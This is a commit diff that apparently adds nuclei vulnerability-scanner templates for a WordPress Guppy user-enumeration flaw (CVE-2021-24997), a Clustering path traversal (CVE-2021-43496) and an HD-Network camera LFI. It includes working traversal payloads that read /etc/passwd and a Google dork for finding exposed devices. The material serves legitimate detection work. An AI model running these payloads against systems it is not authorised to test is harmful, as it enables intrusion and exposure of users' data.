Added CVE-2021-24997 (#3298)
* Added CVE-39226
* Added CVE-39226
* Delete CVE-39226.yaml
* Renamed CVE-39226 to CVE-2021-39226
Fixed naming error
* Added Wp-Guppy-Information-Disclosure template
* Removed File
Found better descriptor
* Added CVE-2021-24997
Added WordPress Guppy Information Disclosure CVE
* Fixed CVE-2021-24997
Fixed YAML formatting
* Fixed Typo
URL Path had an extra double quote
* Auto Generated Templates Stats [Wed Dec 8 23:07:24 UTC 2021] 🤖
* Deleted Blank Space
* Update CVE-2021-24997.yaml
* Update CVE-2021-24997.yaml
* Update CVE-2021-24997.yaml
* Update CVE-2021-24997.yaml
* Added CVE-2021-43496
* Update CVE-2021-43496.yaml
* fix: syntax update
* Added New Vuln
* Update CVE-2021-24997.yaml
* Update CVE-2021-43496.yaml
* Update and rename hd-netowrk-realtime-monitor-system-LFI.yaml to hdnetwork-realtime-lfi.yaml
* fix: lints update
Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io>
Co-authored-by: GitHub Action <action@github.com>
Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
patch-1
parent
8df745ec31
commit
dddb0bbb82
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2021-24997
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CVE-2021-24997
|
||||||
|
author: Evan Rubinstein
|
||||||
|
description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/50540
|
||||||
|
- https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24997
|
||||||
|
classification:
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2021-24997
|
||||||
|
cwe-id: CWE-200
|
||||||
|
tags: wordpress,guppy,api,cve2021,cve,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method:
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"guppyUsers":'
|
||||||
|
- '"userId":'
|
||||||
|
- '"type":'
|
||||||
|
condition: and
|
|
@ -28,4 +28,4 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '"isSnapshot":true'
|
- '"isSnapshot":true'
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2021-43496
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Clustering LFI
|
||||||
|
author: Evan Rubinstein
|
||||||
|
severity: high
|
||||||
|
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
|
||||||
|
reference:
|
||||||
|
- https://github.com/varun-suresh/Clustering/issues/12
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43496
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2021-43496
|
||||||
|
cwe-id: CWE-22
|
||||||
|
tags: cve,cve2021,lfi,clustering
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/img/../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: hdnetwork-realtime-lfi
|
||||||
|
info:
|
||||||
|
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
|
||||||
|
author: Evan Rubinstein
|
||||||
|
severity: high
|
||||||
|
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
|
||||||
|
reference: https://www.exploit-db.com/exploits/50588
|
||||||
|
metadata:
|
||||||
|
google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
|
||||||
|
tags: hdnetwork,lfi,iot,camera
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /language/lang HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: {{BaseURL}}
|
||||||
|
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue